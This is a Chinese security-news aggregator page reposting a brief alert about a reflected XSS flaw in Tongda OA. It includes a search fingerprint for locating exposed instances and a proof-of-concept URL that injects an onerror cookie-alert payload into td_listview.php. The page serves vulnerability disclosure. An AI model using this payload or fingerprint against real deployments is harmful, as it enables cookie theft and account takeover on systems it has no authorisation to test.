欢迎光临！

登录

DNSlog
CN-SEC中文网·在线工具
在线工具集合
娱乐一下
友情链接

CN-SEC 中文网

聚合网络安全,存储安全技术文章,融合安全最新讯息

登录

首页
安全新闻
云安全
安全博客
安全漏洞
- 乌云漏洞
安全文章
逆向工程
安全开发
- 代码审计
安全工具
安全闲碎

搜索热点

首页安全漏洞正文

关于通达OA存在反射XSS漏洞的预警

2024年2月28日00:48:59评论38 views字数 262阅读0分52秒阅读模式

通达OA是中国协同办公自动化软件(OA软件)普及型的旗舰产品。该系统存在xss跨站脚本漏洞，可能造成cookie泄漏，黑客可利用获得的cookie登录系统。

指纹：

app="TDXK-通达OA"

poc：

http://ip/module/html_editor/editor/plugins/td_listview/td_listview.php?GZIP_POSTFIX=%22+onerror=alert(document.cookie)+a=1

关于通达OA存在反射XSS漏洞的预警

原文始发于微信公众号（丁永博的成长日记）：关于通达OA存在反射XSS漏洞的预警

http://cn-sec.com/archives/2532046.html 复制链接复制链接

左青龙
微信扫一扫

右白虎
微信扫一扫

td
通达OA
xss漏洞

【漏洞复现】ZenTao（禅道）身份认证绕过漏洞（QVD-2024-15263）

（CVE-2024-25648）福昕阅读器 ComboBox 小部件格式事件 UAF

漏洞复现 || SpringBlade dict-biz/list接口SQL注入

漏洞预警 | 大华智慧园区综合管理平台远程代码执行漏洞

漏洞预警 | JeecgBoot任意文件上传漏洞

漏洞预警 | 若依druid未授权访问漏洞

Cisco IOS XE Web UI存在权限提升漏洞(CVE-2023-20198)

【0day】KingPortal运行系统信息泄露漏洞【未公开|附poc】

LiveGBS user/save存在逻辑缺陷漏洞(CNVD-2023-72138)

Cisco IOS XE Web UI存在权限提升漏洞(CVE-2023-20198)

本文由 admin 发表于 2024年2月28日00:48:59
转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出)：
关于通达OA存在反射XSS漏洞的预警http://cn-sec.com/archives/2532046.html

打靶练习16-noontide

工具开发-CSx4Ldr-Ziglang 免杀绕过WD

通达OA down 未授权员工信息泄露漏洞

【安全前沿】XSS漏洞深度探索：高级利用策略与实战案例

edu某学院-存储型xss漏洞小思路

记一次有趣的XSS漏洞挖掘

广告位招租

广告位招租1

广告位招租

广告位招租2

发表评论

匿名网友填写信息

昵称

邮箱

网址

Δ

【腾讯云】产品特惠热卖中

【腾讯云】云服务器、云数据库、COS、CDN、短信等云产品特惠热卖中

本类热门文章

TurboGate邮件网关漏洞合集 49,160 views 0
斗鱼TV两处功能平行权限漏洞 16,784 views 0
666个政府网站sql注入漏洞的注入点 15,033 views 0
帆软报表 v8.0 任意文件读取漏洞 CNVD-2018-04757 8,193 views 1
史上最强搜索神器章鱼搜索xss跨站 7,586 views 0
通用型正方教务（通杀各版本）存在注入（不需登陆）+获得webshell+提权内网漫游 6,548 views 0
【漏洞预警】奇安信vpn存在未授权管理用户遍历及任意账号密码修改，已复现 6,433 views 2

安全漏洞

【漏洞复现】ZenTao（禅道）身份认证绕过漏洞（QVD-2024-15263） 05/02 2 views
（CVE-2024-25648）福昕阅读器 ComboBox 小部件格式事件 UAF 05/02 0 views
漏洞复现 || SpringBlade dict-biz/list接口SQL注入 05/02 2 views
漏洞预警 | 大华智慧园区综合管理平台远程代码执行漏洞 05/01 4 views
漏洞预警 | JeecgBoot任意文件上传漏洞 05/01 5 views
漏洞预警 | 若依druid未授权访问漏洞 05/01 3 views
Cisco IOS XE Web UI存在权限提升漏洞(CVE-2023-20198) 05/01 1 views
【0day】KingPortal运行系统信息泄露漏洞【未公开|附poc】 05/01 3 views
LiveGBS user/save存在逻辑缺陷漏洞(CNVD-2023-72138) 05/01 3 views
Cisco IOS XE Web UI存在权限提升漏洞(CVE-2023-20198) 05/01 6 views

热门标签

远程代码执行漏洞勒索软件文件 web payload 工具代码网络 windows microsoft https 渗透测试 com 漏洞 shell 攻击者未分类 ip 安全 sql 服务器 python 网络安全 android shellcode 应用程序 app apache cve 网络攻击黑客信息安全数据安全 java 密码 linux http cwe 公众号用户攻击 xss 恶意软件漏洞复现 php rce github 身份验证 ctf 漏洞预警

最新文章

【漏洞复现】ZenTao（禅道）身份认证绕过漏洞（QVD-2024-15263） 05/02 2 views
2024鹅厂游戏安全技术竞赛决赛题解-PC客户端 05/02 0 views
（CVE-2024-25648）福昕阅读器 ComboBox 小部件格式事件 UAF 05/02 0 views
支付漏洞实现0元购 05/02 3 views
5000 多台 CrushFTP 服务器被零日漏洞攻击 05/02 1 views
利用山寨谷歌 Chrome 传播，安全公司披露勒索木马 Brokewell 05/02 2 views
大众汽车遭黑客入侵长达 5 年，燃油引擎 / 电池等机密文件泄露 05/02 6 views

大家喜欢

669个大学网站都有注入点 4305/01
【工具】Awvs14.7.220401065|可自测Spring4Shell漏洞 2304/03
信息安全工程师教程第2版（文末附电子版下载） 1709/07
Cobalt Strike 4.4 (August 04, 2021)发布 1308/26
正方教务管理系统最新版无条件注入&GetShell 1201/01
Acunetix14.x全版本通杀破解补丁 1012/17
Android逆向练习1 跳过签名验证 901/18

关于本站

CN-SEC.COM中文网

聚合网络安全,存储安全技术文章,融合安全最新讯息

文章105354 留言 544 访客17316737

CN-SEC 中文网

网站概况[CN-SEC 中文网]

文章105354
分类47
标签115188
留言544
链接0
浏览17316737
今日76
本周184
运行2955 天
更新2024-5-2

Copyright © CN-SEC中文网版权所有.

微信

在线工具
娱乐一下
在线工具集
DNSlog

登录找回密码

记住我的登录信息

输入用户名或电子邮件

HP

重置密码链接通过邮箱发送给您

目录

8888